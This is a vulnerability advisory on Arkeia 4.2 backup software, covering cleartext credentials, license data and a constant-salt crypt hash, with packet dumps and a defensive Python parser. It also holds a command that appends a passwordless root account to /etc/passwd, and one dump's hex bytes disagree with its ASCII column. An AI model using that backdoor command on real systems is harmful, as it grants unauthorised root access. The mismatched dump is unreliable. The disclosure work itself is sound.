COMMAND

    Arkeia

SYSTEMS AFFECTED

    Arkeia 4.2

PROBLEM

    Quentyn Taylor found the following.  Arkeia simplifies data
    protection by providing automated backup and recovery.  The system
    supports a wide variety of computers, operating systems and storage
    devices.  It is easy to install, configure and use.  It is fast,
    reliable and scales from a few systems to an enterprise.

    The client-gui <-> server communication is not encrypted by default
    (the passwords are hashed, see below) and a wealth of interesting
    information is sent in the clear.  The information sent by the
    client-gui could easily lead to remote root compromise.

    The client logs into the server in the normal way; an attacker
    sniffs the traffic between the client-gui and the server.

    Many installations of arkeia will be installed on remote sites and
    controlled  remotely  via  the  client-gui  (available  for   most
    architectures).  The  client-gui appears not  to communicate in  a
    secure  way  with  the  server,  possibly  allowing an attacker to
    compromise an arkeia account.

    By default  the security  options in  /usr/knox/nlp/auth* are  not
    activated.   These  options  do  not  appear  to change encryption
    options.

    Encryption, we believe, costs extra:

        http://support.arkeia.com/cgi-bin/arkeia/solution?11=000811-0000&130=0965990356&14=&2715=&15=&2716=&57=search&58=&2900=E1KciKRhYN&25=7&3=encryption

    In the default install /usr/knox/ is mode 755 (changing it to 750,
    owned root:root, solves this).  Also by default the "root" account
    (the default administrator account) has its password set to null.

    If this product were installed in an unsecured environment there
    could be a "race condition" to see who could set the password first.

    The password is hashed with the crypt function using a constant salt
    (the characters "n3"), which limits passwords to 8 significant
    characters.  Authentication success/failure information is sent in
    the clear.

    License Information - the full set of license information is sent in
    the clear (including version, serial, organization, key, expiry and
    the type of drive the product is licensed for).

    Username - Username  and role is  sent in the  clear (so that  you
    know which account to compromise).

    Weak passwords (network packet dumps from Ethereal; xena is the
    Arkeia server):

        0000  00 b0 d0 22 e2 d0 00 b0  d0 78 96 73 08 00 45 00   .°Ð"âÐ.°Ðx.s..E.
        0010  00 9b 86 ea 40 00 40 06  2f 47 c0 a8 01 33 c0 a8   ...ê@.@./GÀ¨.3À¨
        0020  01 a8 04 01 02 69 0d 92  7e 0f 1c 9e 41 36 80 18   .¨...i..~...A6..
        0030  29 e0 a9 27 00 00 01 01  08 0a 01 90 10 14 60 b8   )à©'..........`¸
        0040  48 b3 00 69 00 01 00 00  00 5f 4c 00 49 4e 4f 44   H³.i....._L.INOD
        0050  45 00 78 65 6e 61 00 49  50 41 53 53 57 4f 52 44   E.xena.IPASSWORD
        0060  00 6e 33 56 32 57 6f 63  58 4d 39 33 41 6b 00 49   .n3V2WocXM93Ak.I
        0070  4e 41 4d 45 00 72 6f 6f  74 00 49 45 4d 41 49 4c   NAME.root.IEMAIL
        0080  00 61 72 6b 65 69 61 40  66 6f 74 61 6e 67 6f 2e   .arkeia@fotango.
        0090  63 6f 6d 00 49 52 4f 4c  45 00 41 44 4d 49 4e 49   com.IROLE.ADMINI
        00a0  53 54 52 41 54 4f 52 00  45                        STRATOR.E

    The  above  packet  contains  the  password  "password"  hashed to
    n3V2WocXM93Ak, the  packet below  contains the  password "letmein"
    hashed to n3LGeVp5KwvfE.

        0000  00 b0 d0 22 e2 d0 00 b0  d0 78 96 73 08 00 45 00   .°Ð"âÐ.°Ðx.s..E.
        0010  00 63 89 55 40 00 40 06  2d 14 c0 a8 01 33 c0 a8   .c.U@.@.-.À¨.3À¨
        0020  01 a8 04 01 02 69 e1 07  51 3c ee 26 bc b6 80 18   .¨...iá.Q<î&¼¶..
        0030  16 d0 d7 4d 00 00 01 01  08 0a 01 6f d9 fa 60 98   .Ð×M.......oÙú`.
        0040  11 ea 00 61 00 02 00 00  00 27 72 6f 6f 74 00 6e   .ê.a.....'root.n
        0050  33 35 56 57 4f 45 55 51  76 57 74 63 00 39 39 37   n3LGeVp5KwvfE.997
        0060  34 33 35 30 34 37 00 00  00 00 00 00 00 00 00 00   435047..........
        0070  00

    Now if you look at the hashes (n3V2WocXM93Ak and n3LGeVp5KwvfE)
    you notice that the string n3 appears at the front (this is common
    to every password hash it sends).

    So let's see how they have encrypted it (crypt?).  Let's try:

        perl -e 'print crypt "password", "n3"'

    gives

        n3V2WocXM93Ak

    and

        perl -e 'print crypt "letmein", "n3"'

    gives

        n3LGeVp5KwvfE

    So there we have it: they use crypt with a constant salt of "n3".

    This has been verified with both  the linux gui client and the  MS
    java version (on win2k).

    A problem inherent in this scheme: passwords are effectively limited
    to 8 characters, i.e. setting the password to "passwordpassword"
    gives:

        0000  00 b0 d0 22 e2 d0 00 b0  d0 78 96 73 08 00 45 00   .°Ð"âÐ.°Ðx.s..E.
        0010  00 63 6a 83 40 00 40 06  4b e6 c0 a8 01 33 c0 a8   .cj.@.@.KæÀ¨.3À¨
        0020  01 a8 04 01 02 69 e9 4e  1d 1b f6 f2 a5 d0 80 18   .¨...iéN..öò¥Ð..
        0030  16 d0 4c e6 00 00 01 01  08 0a 01 7c 76 ea 60 a4   .ÐLæ.......|vê`¤
        0040  af 1e 00 61 00 02 00 00  00 27 72 6f 6f 74 00 6e   ¯..a.....'root.n
        0050  33 56 32 57 6f 63 58 4d  39 33 41 6b 00 39 39 37   3V2WocXM93Ak.997
        0060  34 34 33 33 31 33 00 00  00 00 00 00 00 00 00 00   443313..........

    So although you may be using passwords longer than 8 characters for
    your root passwords, Arkeia (which is a root-level service) only
    uses the first 8.
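    The following Python is an added example, not code from the advisory
    or from Arkeia.  It parses the two captures shown above (the user
    record sent after logging in with "password", and the login sent
    after the password was changed to "passwordpassword") straight from
    their hex dumps, extracts the cleartext fields, flags the 13-character
    constant-salt crypt(3) string, and shows that both frames carry the
    identical hash, which is the 8-character truncation in action.  It
    doubles as a detection check: any flow to or from 617/tcp (the server
    port visible as 02 69 in every dump) that yields these fields is
    Arkeia credential material crossing the wire unprotected.  The frame
    layout (Ethernet II / IPv4 / TCP, then a message-type letter at
    payload offset 1, an 8-byte header, then NUL-separated strings) and
    the reading of the trailing decimal as a timestamp are assumptions
    inferred from the dumps, not a documented protocol; the tag names
    (INODE, IPASSWORD, INAME, IEMAIL, IROLE) are the ones visible in the
    captures.

```python
"""Read Arkeia 4.2 client/server traffic straight from the advisory's hex
dumps.  Added example, not code from the advisory or from Arkeia."""
import re

# Frames transcribed from the advisory's Ethereal dumps (hex columns only).
# FRAME_RECORD: user record sent after a login with password "password".
# FRAME_LOGIN: login sent after the password was set to "passwordpassword".
FRAME_RECORD = bytes.fromhex(
    "00 b0 d0 22 e2 d0 00 b0 d0 78 96 73 08 00 45 00 "
    "00 9b 86 ea 40 00 40 06 2f 47 c0 a8 01 33 c0 a8 "
    "01 a8 04 01 02 69 0d 92 7e 0f 1c 9e 41 36 80 18 "
    "29 e0 a9 27 00 00 01 01 08 0a 01 90 10 14 60 b8 "
    "48 b3 00 69 00 01 00 00 00 5f 4c 00 49 4e 4f 44 "
    "45 00 78 65 6e 61 00 49 50 41 53 53 57 4f 52 44 "
    "00 6e 33 56 32 57 6f 63 58 4d 39 33 41 6b 00 49 "
    "4e 41 4d 45 00 72 6f 6f 74 00 49 45 4d 41 49 4c "
    "00 61 72 6b 65 69 61 40 66 6f 74 61 6e 67 6f 2e "
    "63 6f 6d 00 49 52 4f 4c 45 00 41 44 4d 49 4e 49 "
    "53 54 52 41 54 4f 52 00 45"
)
FRAME_LOGIN = bytes.fromhex(
    "00 b0 d0 22 e2 d0 00 b0 d0 78 96 73 08 00 45 00 "
    "00 63 6a 83 40 00 40 06 4b e6 c0 a8 01 33 c0 a8 "
    "01 a8 04 01 02 69 e9 4e 1d 1b f6 f2 a5 d0 80 18 "
    "16 d0 4c e6 00 00 01 01 08 0a 01 7c 76 ea 60 a4 "
    "af 1e 00 61 00 02 00 00 00 27 72 6f 6f 74 00 6e "
    "33 56 32 57 6f 63 58 4d 39 33 41 6b 00 39 39 37 "
    "34 34 33 33 31 33 00 00 00 00 00 00 00 00 00 00"
)

ARKEIA_PORT = 617  # server side of every flow in the dumps (bytes 02 69)
# Traditional DES crypt(3) output: 2-char salt + 11 chars of [./0-9A-Za-z].
TRADITIONAL_CRYPT = re.compile(r"^([./0-9A-Za-z]{2})[./0-9A-Za-z]{11}$")


def tcp_ports(frame):
    """(source port, destination port) of an Ethernet II / IPv4 / TCP frame."""
    tcp = 14 + (frame[14] & 0x0F) * 4            # skip Ethernet + IPv4 (IHL)
    src = int.from_bytes(frame[tcp:tcp + 2], "big")
    dst = int.from_bytes(frame[tcp + 2:tcp + 4], "big")
    return src, dst


def tcp_payload(frame):
    """TCP payload of an Ethernet II / IPv4 / TCP frame, honouring options."""
    if frame[12:14] != b"\x08\x00" or frame[14 + 9] != 6:
        raise ValueError("expected an IPv4/TCP frame")
    tcp = 14 + (frame[14] & 0x0F) * 4
    data_off = (frame[tcp + 12] >> 4) * 4        # TCP header length in bytes
    return frame[tcp + data_off:]


def parse_message(payload):
    """Decode one Arkeia message into its cleartext fields (layout assumed)."""
    kind = chr(payload[1])                       # 'a' = login, 'i' = record
    tokens = payload[8:].decode("latin-1").split("\x00")
    if kind == "a":
        # Login: user name, crypt(3) string, and a decimal that looks like a
        # Unix timestamp (assumption).
        return {"type": "login", "user": tokens[0], "hash": tokens[1],
                "timestamp": tokens[2]}
    if kind == "i" and tokens[0] == "L":
        # Record list: 'L', then tag/value pairs, terminated by 'E'.
        fields = {}
        pairs = tokens[1:]
        for tag, value in zip(pairs[0::2], pairs[1::2]):
            if tag == "E":
                break
            fields[tag] = value
        return {"type": "record", "fields": fields}
    return {"type": "unknown", "kind": kind, "tokens": tokens}


def constant_salt_hash(value, salt="n3"):
    """True if value is a traditional crypt(3) string with the fixed salt."""
    m = TRADITIONAL_CRYPT.match(value)
    return bool(m) and m.group(1) == salt


def audit_frames(frames):
    """Report credential material seen in cleartext on Arkeia flows."""
    findings = []
    for frame in frames:
        if ARKEIA_PORT not in tcp_ports(frame):
            continue
        msg = parse_message(tcp_payload(frame))
        if msg["type"] == "login":
            findings.append({"issue": "login hash in clear", "user": msg["user"],
                             "hash": msg["hash"],
                             "constant_salt": constant_salt_hash(msg["hash"])})
        elif msg["type"] == "record" and "IPASSWORD" in msg["fields"]:
            f = msg["fields"]
            findings.append({"issue": "user record in clear", "user": f.get("INAME"),
                             "role": f.get("IROLE"), "hash": f["IPASSWORD"],
                             "constant_salt": constant_salt_hash(f["IPASSWORD"])})
    return findings


def same_hash(frame_a, frame_b):
    """True when two captures carry the same hash: "password" and
    "passwordpassword" collide because crypt(3) uses only 8 characters."""
    return audit_frames([frame_a])[0]["hash"] == audit_frames([frame_b])[0]["hash"]


def recompute_hash(password, salt="n3"):
    """Reproduce the advisory's Perl one-liner; None where the crypt module
    is unavailable (it was removed from the standard library in 3.13)."""
    try:
        import crypt
    except (ImportError, DeprecationWarning):
        return None
    return crypt.crypt(password, salt)


if __name__ == "__main__":
    for finding in audit_frames([FRAME_RECORD, FRAME_LOGIN]):
        print(finding)
    print("same hash for 'password' and 'passwordpassword':",
          same_hash(FRAME_RECORD, FRAME_LOGIN))
    print("crypt('password', 'n3') =", recompute_hash("password"))
```

    The audit only needs the packet bytes, so the same functions can be
    run over frames pulled from a capture file to confirm that no Arkeia
    GUI session is crossing an untrusted network segment.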

    Authentication info sent in the clear + roles listed in the clear:

        0000  00 b0 d0 78 96 73 00 b0  d0 22 e2 d0 08 00 45 00   .°Ðx.s.°Ð"âÐ..E.
        0010  01 16 83 77 40 00 40 06  32 3f c0 a8 01 a8 c0 a8   ...w@.@.2?À¨.¨À¨
        0020  01 33 02 69 04 01 ee 26  bc eb e1 07 51 a5 80 18   .3.i..î&¼ëá.Q¥..
        0030  fe 88 b2 9c 00 00 01 01  08 0a 60 98 11 ee 01 6f   þ.²........`..î.o
        0040  d9 ff 00 68 00 01 00 00  00 04 00 00 00 00 00 65   Ùÿ.h...........e
        0050  00 01 00 00 00 66 32 30  30 31 2f 30 38 2f 31 30   .....f2001/08/10
        0060  20 31 30 3a 32 31 3a 30  32 20 49 33 30 31 35 30    10:21:02 I30150
        0070  30 32 30 20 55 53 52 5f  56 41 4c 49 44 41 54 45   020 USR_VALIDATE
        0080  3a 20 59 6f 75 20 68 61  76 65 20 73 75 63 63 65   : You have succe
        0090  73 73 66 75 6c 6c 79 20  6c 6f 61 64 65 64 20 74   ssfully loaded t
        00a0  68 65 20 63 75 72 72 65  6e 74 20 75 73 65 72 20   he current user 
        00b0  69 6e 66 6f 72 6d 61 74  69 6f 6e 00 00 69 00 01   information..i..
        00c0  00 00 00 60 4c 00 54 50  4e 41 4d 45 00 72 6f 6f   ...`L.TPNAME.roo
        00d0  74 00 50 52 4f 4c 45 00  41 44 4d 49 4e 49 53 54   t.PROLE.ADMINIST
        00e0  52 41 54 4f 52 00 50 50  41 53 53 57 4f 52 44 00   RATOR.PPASSWORD.
        00f0  6e 33 35 56 57 4f 45 55  51 76 57 74 63 00 50 4e   n35VWOEUQvWtc.PN
        0100  4f 44 45 00 78 65 6e 61  00 50 45 4d 41 49 4c 00   ODE.xena.PEMAIL.
        0110  61 72 6b 65 69 61 40 66  6f 74 61 6e 67 6f 2e 63   arkeia@fotango.c
        0120  6f 6d 00 45                                        om.E

    Notice the password hash just went past again.

    License Information (the actual license numbers have been removed):

        0000  00 b0 d0 78 96 73 00 b0  d0 22 e2 d0 08 00 45 00   .°Ðx.s.°Ð"âÐ..E.
        0010  01 40 83 87 40 00 40 06  32 05 c0 a8 01 a8 c0 a8   .@..@.@.2.À¨.¨À¨
        0020  01 33 02 69 04 01 ee 26  bd fa e1 07 51 f0 80 18   .3.i..î&½úá.Qð..
        0030  fe 88 d2 ee 00 00 01 01  08 0a 60 98 11 fa 01 6f   þ.Òî......`..ú.o
        0040  da 0b 00 68 00 01 00 00  00 04 00 00 00 00 00 65   Ú..h...........e
        0050  00 01 00 00 00 5b 32 30  30 31 2f 30 38 2f 31 30   .....[2001/08/10
        0060  20 31 30 3a 32 31 3a 30  32 20 57 33 30 31 35 30    10:21:02 W30150
        0070  31 33 30 20 4c 49 43 45  4e 53 45 5f 47 45 54 3a   130 LICENSE_GET:
        0080  20 54 68 69 73 20 76 65  72 73 69 6f 6e 20 6f 66    This version of
        0090  20 41 72 6b 65 69 61 20  69 73 20 6c 69 63 65 6e    Arkeia is licen
        00a0  73 65 64 20 74 6f 20 27  46 4f 54 41 4e 47 4f 27   sed to 'FOTANGO'
        00b0  00 00 69 00 01 00 00 00  95 4c 00 49 4c 49 43 45   ..i......L.ILICE
        00c0  4e 53 45 00 41 52 4b 34  32 00 49 53 45 52 49 41   NSE.ARK42.ISERIA
        00d0  4c 00 54 45 39 32 47 52  31 48 52 48 4e 44 50 4e   ${OUR SERIAL}
        00e0  00 49 4f 52 47 41 4e 49  53 41 54 49 4f 4e 00 46   .IORGANISATION.F
        00f0  4f 54 41 4e 47 4f 00 49  4b 45 59 00 58 58 58 55   OTANGO.IKEY.${OUR KEY}
        0100  33 58 45 35 59 4e 38 56  34 33 00 49 4f 50 54 49   43.IOPTI
        0110  4f 4e 00 35 33 00 49 45  58 50 49 52 59 00 30 00   ON.53.IEXPIRY.0.
        0120  49 44 52 49 56 45 00 32  00 49 46 4c 4f 57 34 00   IDRIVE.2.IFLOW4.
        0130  32 00 49 46 4c 4f 57 33  00 30 00 49 46 4c 4f 57   2.IFLOW3.0.IFLOW
        0140  32 00 35 00 49 46 4c 4f  57 31 00 32 00 45         2.5.IFLOW1.2.E

    As you can see above, the license number, serial, name, number of
    flows and the key (something they tell you to keep safe) are all
    sent in the clear.

    Because the salt is known and the maximum password length is 8
    characters, it would not be beyond the realms of possibility to
    crack the password (effectively a root password).  Once you have
    access through the gui, you have the possibility of running a
    command from the gui before and after the backup job.  This command
    is run as root and can be anything.  Therefore you have full access
    to the box to do with as you please.  However, it is only an arkeia
    "root" password.  It's not even a real user with a shell.  Make sure
    your system root password is different from your arkeia root
    password.

    Running a command is easy,  go into the advanced options  and tell
    it to run:

        echo "r00t::0:0:root:/root:/bin/bash" >> /etc/passwd

    A DoS situation could occur if you restored a file over another
    (any file over /etc/shadow); however, with full shell access to the
    server, why bother?

SOLUTION

    Turn on encryption.  It costs more money, and we are not sure that
    the GUI client supports it (certainly none of the ones we looked at,
    e.g. Linux, did), so even if you can encrypt the data being sent to
    the server (the actual data being sent to tape) it doesn't look like
    the gui client can support it.

    Use an SSH tunnel.

    Use Arkeia only over "trusted" networks.

    This article on  arkeia's support site  explains how to  set up an
    ssh tunnel through a firewall for arkeia:

        http://support.arkeia.com/cgi-bin/arkeia/solution?11=000322-0014&130=0953783453&14=&2715=&15=&2716=&57=search&58=&2900=JP9cQm9m9p&25=7&3=ssh

    Use Legato Networker ;)